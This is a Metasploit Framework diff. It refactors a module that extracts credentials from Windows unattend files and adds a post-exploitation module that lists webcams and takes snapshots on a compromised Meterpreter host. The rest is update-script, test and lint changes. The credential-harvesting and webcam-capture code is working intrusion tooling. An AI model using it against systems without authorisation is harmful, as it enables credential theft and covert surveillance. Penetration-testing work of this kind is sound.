- 'Header' => 'WindowsDeploymentServices',
- 'Indent' => 1,
- 'Columns' => ['Domain', 'Username', 'Password']
- })
-
- table << [domain, username, password]
-
- return [table]
- end
-
-
#
# Save Rex tables separately
#
@@ -309,20 +164,8 @@ def run
# XML failed to parse, will not go on from here
return if not xml
- # Extract the credentials
- tables = []
- unattend = xml.elements['unattend']
- return if unattend.nil?
-
- unattend.each_element do |settings|
- next if settings.class != REXML::Element
- settings.get_elements('component').each do |c|
- next if c.class != REXML::Element
- tables << extract_useraccounts(c.elements['UserAccounts'])
- tables << extract_autologon(c.elements['AutoLogon'])
- tables << extract_deployment(c.elements['WindowsDeploymentServices'])
- end
- end
+ results = Rex::Parser::Unattend.parse(xml)
+ tables = create_display_tables(results)
# Save the data
save_cred_tables(tables.flatten) if not tables.empty?
@@ -330,4 +173,60 @@ def run
return if not datastore['GETALL']
end
end
+
+ def create_display_tables(results)
+ tables = []
+ wds_table = Rex::Ui::Text::Table.new({
+ 'Header' => 'WindowsDeploymentServices',
+ 'Indent' => 1,
+ 'Columns' => ['Domain', 'Username', 'Password']
+ })
+
+ autologin_table = Rex::Ui::Text::Table.new({
+ 'Header' => 'AutoLogon',
+ 'Indent' => 1,
+ 'Columns' => ['Domain', 'Username', 'Password']
+ })
+
+ admin_table = Rex::Ui::Text::Table.new({
+ 'Header' => 'AdministratorPasswords',
+ 'Indent' => 1,
+ 'Columns' => ['Username', 'Password']
+ })
+
+ domain_table = Rex::Ui::Text::Table.new({
+ 'Header' => 'DomainAccounts',
+ 'Indent' => 1,
+ 'Columns' => ['Username', 'Group']
+ })
+
+ local_table = Rex::Ui::Text::Table.new({
+ 'Header' => 'LocalAccounts',
+ 'Indent' => 1,
+ 'Columns' => ['Username', 'Password']
+ })
+ results.each do |result|
+ unless result.empty?
+ case result['type']
+ when 'wds'
+ wds_table << [result['domain'], result['username'], result['password']]
+ when 'auto'
+ autologin_table << [result['domain'], result['username'], result['password']]
+ when 'admin'
+ admin_table << [result['username'], result['password']]
+ when 'domain'
+ domain_table << [result['username'], result['group']]
+ when 'local'
+ local_table << [result['username'], result['password']]
+ end
+ end
+ end
+
+ tables << autologin_table
+ tables << admin_table
+ tables << domain_table
+ tables << local_table
+
+ return tables
+ end
end
diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb
new file mode 100644
index 000000000000..aab47587c388
--- /dev/null
+++ b/modules/post/windows/manage/webcam.rb
@@ -0,0 +1,136 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Windows Manage Webcam',
+ 'Description' => %q{
+ This module will allow the user to detect installed webcams (with
+ the LIST action) or take a snapshot (with the SNAPSHOT) action.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'sinn3r'],
+ 'Platform' => [ 'win'],
+ 'SessionTypes' => [ "meterpreter" ],
+ 'Actions' =>
+ [
+ [ 'LIST', { 'Description' => 'Show a list of webcams' } ],
+ [ 'SNAPSHOT', { 'Description' => 'Take a snapshot with the webcam' } ]
+ ],
+ 'DefaultAction' => 'LIST'
+ ))
+
+ register_options(
+ [
+ OptInt.new('INDEX', [false, 'The index of the webcam to use', 1]),
+ OptInt.new('QUALITY', [false, 'The JPEG image quality', 50])
+ ], self.class)
+ end
+
+
+ def run
+ if client.nil?
+ print_error("Invalid session ID selected. Make sure the host isn't dead.")
+ return
+ end
+
+ if not action
+ print_error("Invalid action")
+ return
+ end
+
+ case action.name
+ when /^list$/i
+ list_webcams(true)
+ when /^snapshot$/i
+ snapshot
+ end
+ end
+
+
+ def rhost
+ client.sock.peerhost
+ end
+
+
+ def snapshot
+ webcams = list_webcams
+
+ if webcams.empty?
+ print_error("#{rhost} - No webcams found")
+ return
+ end
+
+ if not webcams[datastore['INDEX']-1]
+ print_error("#{rhost} - No such index: #{datastore['INDEX'].to_s}")
+ return
+ end
+
+ buf = nil
+
+ begin
+ print_status("#{rhost} - Starting...")
+ client.webcam.webcam_start(datastore['INDEX'])
+
+ buf = client.webcam.webcam_get_frame(datastore['QUALITY'])
+ if buf
+ print_status("#{rhost} - Got frame")
+
+ p = store_loot(
+ "#{rhost}.webcam.snapshot",
+ 'application/octet-stream',
+ rhost,
+ buf,
+ "#{rhost}_snapshot.jpg",
+ "#{rhost} Webcam Snapshot"
+ )
+
+ print_good("#{rhost} - Snapshot saved: #{p}")
+ end
+
+ client.webcam.webcam_stop
+ print_status("#{rhost} - Stopped")
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error(e.message)
+ return
+ end
+ end
+
+
+ def list_webcams(show=false)
+ begin
+ webcams = client.webcam.webcam_list
+ rescue Rex::Post::Meterpreter::RequestError
+ webcams = []
+ end
+
+ if show
+ tbl = Rex::Ui::Text::Table.new(
+ 'Header' => 'Webcam List',
+ 'Indent' => 1,
+ 'Columns' => ['Index', 'Name']
+ )
+
+ webcams.each_with_index do |name, indx|
+ tbl << [(indx+1).to_s, name]
+ end
+
+ print_line(tbl.to_s)
+ end
+
+ return webcams
+ end
+
+end
+
diff --git a/msfupdate b/msfupdate
index be7f75dee586..6b168d009129 100755
--- a/msfupdate
+++ b/msfupdate
@@ -23,13 +23,20 @@ $stderr.puts "[*] Attempting to update the Metasploit Framework..."
$stderr.puts "[*]"
$stderr.puts ""
+# Bail right away, no waiting around for consoles.
if not (Process.uid == 0 or File.stat(msfbase).owned?)
- $stderr.puts "[-] ERROR: User running msfupdate does not own the metasploit install"
- $stderr.puts "Please run msfupdate as the same user who installed metasploit."
+ $stderr.puts "[-] ERROR: User running msfupdate does not own the Metasploit installation"
+ $stderr.puts "[-] Please run msfupdate as the same user who installed Metasploit."
+ exit 0x10
end
-def is_pro
- File.exists?(File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb")))
+def is_apt
+ File.exists?(File.expand_path(File.join(@msfbase_dir, '.apt')))
+end
+
+# Are you an installer, or did you get here via a source checkout?
+def is_installed
+ File.exists?(File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb"))) && !is_apt
end
def is_git
@@ -56,6 +63,34 @@ def print_deprecation_warning
$stdout.puts "[*] Please adjust your egress firewall rules accordingly."
end
+def maybe_wait_and_exit(exit_code=0)
+ if @actually_wait
+ $stdout.puts ""
+ $stdout.puts "[*] Please hit enter to exit"
+ $stdout.puts ""
+ $stdin.readline
+ exit exit_code
+ end
+end
+
+def apt_upgrade_available(package)
+ require 'open3'
+ installed = nil
+ upgrade = nil
+ ::Open3.popen3("apt-cache", "policy", package) do |stdin, stdout, stderr|
+ stdout.each do |line|
+ installed = $1 if line =~ /Installed: ([\w\-+.:~]+)$/
+ upgrade = $1 if line =~ /Candidate: ([\w\-+.:~]+)$/
+ break if installed && upgrade
+ end
+ end
+ if installed && installed != upgrade
+ upgrade
+ else
+ nil
+ end
+end
+
# Some of these args are meaningful for SVN, some for Git,
# some for both. Fun times.
@args.each_with_index do |arg,i|
@@ -102,7 +137,7 @@ if is_svn
$stderr.puts "[-] If you used a binary installer, make sure you run the symlink in"
$stderr.puts "[-] /usr/local/bin instead of running this file directly (e.g.: ./msfupdate)"
$stderr.puts "[-] to ensure a proper environment."
- exit 1
+ maybe_wait_and_exit 1
else
# Cleanup worked, go ahead and update
system("svn", "update", *@args)
@@ -134,7 +169,7 @@ if is_git
$stderr.puts "[-] If you used a binary installer, make sure you run the symlink in"
$stderr.puts "[-] /usr/local/bin instead of running this file directly (e.g.: ./msfupdate)"
$stderr.puts "[-] to ensure a proper environment."
- exit 1
+ maybe_wait_and_exit 1
elsif not committed
system("git", "stash")
$stdout.puts "[*] Stashed local changes to avoid merge conflicts."
@@ -147,18 +182,52 @@ if is_git
system("git", "merge", "#{remote}/#{branch}")
end
-if is_pro
+if is_installed
update_script = File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb"))
- system("ruby", update_script)
+ product_key = File.expand_path(File.join(@msfbase_dir, "..", "engine", "license", "product.key"))
+ if File.exists? product_key
+ if File.readable? product_key
+ system("ruby", update_script)
+ else
+ $stdout.puts "[-] ERROR: Failed to update Metasploit installation"
+ $stdout.puts ""
+ $stdout.puts "[-] You must be able to read the product key for the"
+ $stdout.puts "[-] Metasploit installation in order to run msfupdate."
+ $stdout.puts "[-] Usually, this means you must be root (EUID 0)."
+ maybe_wait_and_exit 10
+ end
+ else
+ $stdout.puts "[-] ERROR: Failed to update Metasploit installation"
+ $stdout.puts ""
+ $stdout.puts "[-] In order to update your Metasploit installation,"
+ $stdout.puts "[-] you must first register it through the UI, here:"
+ $stderr.puts "[-] https://localhost:3790 (note, Metasploit Community"
+ $stderr.puts "[-] Edition is totally free and takes just a few seconds"
+ $stderr.puts "[-] to register!)"
+ maybe_wait_and_exit 11
+ end
end
-unless is_svn || is_git || is_pro
- raise RuntimeError, "Cannot determine checkout type: `#{@msfbase_dir}'"
+if is_apt
+ $stdout.puts "[*] Checking for updates"
+ system("apt-get", "-qq", "update")
+
+ packages = []
+ packages << 'metasploit-framework' if framework_version = apt_upgrade_available('metasploit-framework')
+ packages << 'metasploit' if pro_version = apt_upgrade_available('metasploit')
+
+ if packages.empty?
+ $stdout.puts "[*] No updates available"
+ else
+ $stdout.puts "[*] Updating to version #{pro_version || framework_version}"
+ system("apt-get", "install", "--assume-yes", *packages)
+ system("/etc/init.d/metasploit start") if packages.include?('metasploit')
+ end
end
-if @actually_wait
- $stderr.puts ""
- $stderr.puts "[*] Please hit enter to exit"
- $stderr.puts ""
- $stdin.readline
+unless is_svn || is_git || is_installed || is_apt
+ raise RuntimeError, "Cannot determine checkout type: `#{@msfbase_dir}'"
end
+
+maybe_wait_and_exit(0)
+
diff --git a/plugins/openvas.rb b/plugins/openvas.rb
index 247a0b7a7d76..34d814055231 100644
--- a/plugins/openvas.rb
+++ b/plugins/openvas.rb
@@ -530,7 +530,7 @@ def cmd_openvas_report_import(*args)
end
else
print_status("Usage: openvas_report_import <report_id> <format_id>")
- print_status("Only the NBE format is supported for importing.")
+ print_status("Only the NBE and XML formats are supported for importing.")
end
end
diff --git a/spec/lib/msf/core/exploit/http/client_spec.rb b/spec/lib/msf/core/exploit/http/client_spec.rb
index 73298366d42b..93180d3a5a72 100644
--- a/spec/lib/msf/core/exploit/http/client_spec.rb
+++ b/spec/lib/msf/core/exploit/http/client_spec.rb
@@ -11,7 +11,7 @@
mod
end
- context 'normalize_uri' do
+ describe '#normalize_uri' do
let(:expected_normalized_uri) do
'/a/b/c'
end
@@ -20,6 +20,20 @@
subject.normalize_uri(unnormalized_uri)
end
+ context "with just '/'" do
+ let(:unnormalized_uri) do
+ '/'
+ end
+
+ it "should be '/'" do
+ unnormalized_uri.should == '/'
+ end
+
+ it "should return '/'" do
+ normalized_uri.should == '/'
+ end
+ end
+
context "with starting '/'" do
let(:unnormalized_uri) do
expected_normalized_uri
@@ -30,7 +44,17 @@
end
it "should not add another starting '/'" do
- normalized_uri.should == expected_normalized_uri
+ normalized_uri.should == expected_normalized_uri
+ end
+
+ context "with multiple internal '/'" do
+ let(:unnormalized_uri) do
+ "/#{expected_normalized_uri.gsub("/", "////")}"
+ end
+
+ it "should remove doubled internal '/'" do
+ normalized_uri.should == expected_normalized_uri
+ end
end
context "with multiple starting '/'" do
@@ -48,39 +72,25 @@
end
context "with trailing '/'" do
+ let(:expected_normalized_uri) do
+ '/a/b/c/'
+ end
+
let(:unnormalized_uri) do
"#{expected_normalized_uri}/"
end
it "should end with '/'" do
- unnormalized_uri[-1, 1].should == '/'
- end
-
- it "should remove the trailing '/'" do
- normalized_uri.should == expected_normalized_uri
- end
-
- context "with just '/'" do
- let(:unnormalized_uri) do
- '/'
- end
-
- it "should be '/'" do
- unnormalized_uri.should == '/'
- end
-
- it "should return '/'" do
- normalized_uri.should == '/'
- end
+ normalized_uri[-1, 1].should == '/'
end
- context "with multiple multiple trailing '/'" do
+ context "with multiple trailing '/'" do
let(:unnormalized_uri) do
- "#{expected_normalized_uri}//"
+ "#{expected_normalized_uri}/"
end
it "should have multiple trailing '/'" do
- unnormalized_uri[-2 .. -1].should == '//'
+ unnormalized_uri[-2,2].should == '//'
end
it "should return only one trailing '/'" do
@@ -105,16 +115,15 @@
end
context "without starting '/'" do
- let(:unnormalized_uri) do
- 'a/b/c'
- end
-
context "with trailing '/'" do
let(:unnormalized_uri) do
'a/b/c/'
end
+ let(:expected_normalized_uri) do
+ '/a/b/c/'
+ end
- it "'should have trailing '/'" do
+ it "should have trailing '/'" do
unnormalized_uri[-1, 1].should == '/'
end
@@ -122,17 +131,31 @@
normalized_uri[0, 1].should == '/'
end
- it "'should remove trailing '/'" do
- normalized_uri[-1, 1].should_not == '/'
+ it "should not remove trailing '/'" do
+ normalized_uri[-1, 1].should == '/'
end
it 'should normalize the uri' do
- normalized_uri.should == expected_normalized_uri
+ normalized_uri.should == "#{expected_normalized_uri}"
+ end
+
+ context "with multiple internal '/'" do
+ let(:unnormalized_uri) do
+ "/#{expected_normalized_uri.gsub("/", "////")}"
+ end
+
+ it "should remove doubled internal '/'" do
+ normalized_uri.should == expected_normalized_uri
+ end
end
end
context "without trailing '/'" do
- it "'should not have trailing '/'" do
+ let(:unnormalized_uri) do
+ 'a/b/c'
+ end
+
+ it "should not have trailing '/'" do
unnormalized_uri[-1, 1].should_not == '/'
end
@@ -143,35 +166,35 @@
it "should add trailing '/'" do
normalized_uri[-1, 1].should_not == '/'
end
+ end
+ end
- context 'with empty string' do
- let(:unnormalized_uri) do
- ''
- end
+ context 'with empty string' do
+ let(:unnormalized_uri) do
+ ''
+ end
- it "should be empty" do
- unnormalized_uri.should be_empty
- end
+ it "should be empty" do
+ unnormalized_uri.should be_empty
+ end
- it "should return '/'" do
- normalized_uri.should == '/'
- end
- end
+ it "should return '/'" do
+ normalized_uri.should == '/'
+ end
+ end
- context 'with nil' do
- let(:unnormalized_uri) do
- nil
- end
+ context 'with nil' do
+ let(:unnormalized_uri) do
+ nil
+ end
- it 'should be nil' do
- unnormalized_uri.should be_nil
- end
+ it 'should be nil' do
+ unnormalized_uri.should be_nil
+ end
- it "should return '/" do
- normalized_uri.should == '/'
- end
- end
+ it "should return '/" do
+ normalized_uri.should == '/'
end
end
end
-end
\ No newline at end of file
+end
diff --git a/spec/lib/rex/encoding/xor/byte.rb b/spec/lib/rex/encoding/xor/byte.rb
new file mode 100644
index 000000000000..03dae077215b
--- /dev/null
+++ b/spec/lib/rex/encoding/xor/byte.rb
@@ -0,0 +1,7 @@
+
+require 'rex/encoding/xor/byte'
+require 'spec_helper'
+
+describe Rex::Encoding::Xor::Byte do
+ it_behaves_like "an xor encoder", 1
+end
diff --git a/spec/lib/rex/encoding/xor/dword.rb b/spec/lib/rex/encoding/xor/dword.rb
new file mode 100644
index 000000000000..353909385549
--- /dev/null
+++ b/spec/lib/rex/encoding/xor/dword.rb
@@ -0,0 +1,7 @@
+
+require 'rex/encoding/xor/dword'
+require 'spec_helper'
+
+describe Rex::Encoding::Xor::Dword do
+ it_behaves_like "an xor encoder", 4
+end
diff --git a/spec/lib/rex/encoding/xor/qword.rb b/spec/lib/rex/encoding/xor/qword.rb
new file mode 100644
index 000000000000..12ae6f6cd381
--- /dev/null
+++ b/spec/lib/rex/encoding/xor/qword.rb
@@ -0,0 +1,7 @@
+
+require 'rex/encoding/xor/qword'
+require 'spec_helper'
+
+describe Rex::Encoding::Xor::Qword do
+ it_behaves_like "an xor encoder", 8
+end
diff --git a/spec/lib/rex/encoding/xor/word.rb b/spec/lib/rex/encoding/xor/word.rb
new file mode 100644
index 000000000000..78284b96d5c5
--- /dev/null
+++ b/spec/lib/rex/encoding/xor/word.rb
@@ -0,0 +1,7 @@
+
+require 'rex/encoding/xor/word'
+require 'spec_helper'
+
+describe Rex::Encoding::Xor::Word do
+ it_behaves_like "an xor encoder", 2
+end
diff --git a/spec/support/shared/examples/xor_encoder.rb b/spec/support/shared/examples/xor_encoder.rb
new file mode 100644
index 000000000000..df9cd08c9ae6
--- /dev/null
+++ b/spec/support/shared/examples/xor_encoder.rb
@@ -0,0 +1,20 @@
+shared_examples_for 'an xor encoder' do |keysize|
+
+ it "should encode one block" do
+ # Yup it returns one of its arguments in an array... Because spoon.
+ encoded, key = described_class.encode("A"*keysize, "A"*keysize)
+ encoded.should eql("\x00"*keysize)
+
+ encoded, key = described_class.encode("\x0f"*keysize, "\xf0"*keysize)
+ encoded.should eql("\xff"*keysize)
+
+ encoded, key = described_class.encode("\xf7"*keysize, "\x7f"*keysize)
+ encoded.should eql("\x88"*keysize)
+ end
+
+ it "should encode multiple blocks" do
+ encoded, key = described_class.encode("\xf7"*keysize*40, "\x7f"*keysize)
+ encoded.should eql("\x88"*keysize*40)
+ end
+
+end
diff --git a/tools/dev/pre-commit-hook.rb b/tools/dev/pre-commit-hook.rb
new file mode 100755
index 000000000000..2625d6d64af6
--- /dev/null
+++ b/tools/dev/pre-commit-hook.rb
@@ -0,0 +1,54 @@
+#!/usr/bin/env ruby
+
+# Check that modules actually pass msftidy checks first.
+# To install this script, make this your pre-commit hook your local
+# metasploit-framework clone. For example, if you have checked out
+# the Metasploit Framework to:
+#
+# /home/mcfakepants/git/metasploit-framework
+#
+# then you will copy this script to:
+#
+# /home/mcfakepants/git/metasploit-framework/.git/hooks/pre-commit
+#
+# You must mark it executable (chmod +x), and do not name it
+# pre-commit.rb (just pre-commit)
+#
+# If you want to keep up on changes with this hook, just:
+#
+# ln -sf <this file> <path to commit hook>
+
+valid = true # Presume validity
+files_to_check = []
+
+results = %x[git diff --cached --name-only]
+
+results.each_line do |fname|
+ fname.strip!
+ next unless File.exist?(fname) and File.file?(fname)
+ next unless fname =~ /modules.+\.rb/
+ files_to_check << fname
+end
+
+if files_to_check.empty?
+ puts "--- No Metasploit modules to check, committing. ---"
+else
+ puts "--- Checking module syntax with tools/msftidy.rb ---"
+ files_to_check.each do |fname|
+ cmd = "ruby ./tools/msftidy.rb #{fname}"
+ msftidy_output= %x[ #{cmd} ]
+ puts "#{fname} - msftidy check passed" if msftidy_output.empty?
+ msftidy_output.each_line do |line|
+ valid = false
+ puts line
+ end
+ end
+ puts "-" * 52
+end
+
+unless valid
+ puts "msftidy.rb objected, aborting commit"
+ puts "To bypass this check use: git commit --no-verify"
+ puts "-" * 52
+ exit(1)
+end
diff --git a/tools/msftidy.rb b/tools/msftidy.rb
index aa63bea6a476..8faa3b03d55a 100755
--- a/tools/msftidy.rb
+++ b/tools/msftidy.rb
@@ -204,7 +204,7 @@ def check_badchars
end
if author_name =~ /^@.+$/
- error("No Twitter handle, please. Try leaving it in a comment instead.")
+ error("No Twitter handles, please. Try leaving it in a comment instead.")
end
if not author_name.ascii_only?
@@ -226,9 +226,7 @@ def test_old_rubies(f_rel)
puts "Checking syntax for #{f_rel}."
rubies ||= RVM.list_strings
res = %x{rvm all do ruby -c #{f_rel}}.split("\n").select {|msg| msg =~ /Syntax OK/}
- rubies.size == res.size
-
- error("Fails alternate Ruby version check") if rubies.size
+ error("Fails alternate Ruby version check") if rubies.size != res.size
end
def check_ranking
@@ -281,6 +279,7 @@ def check_title_casing
words.each do |word|
if %w{and or the for to in of as with a an on at}.include?(word)
next
+ elsif %w{pbot}.include?(word)
elsif word =~ /^[a-z]+$/
warn("Improper capitalization in module title: '#{word}'")
end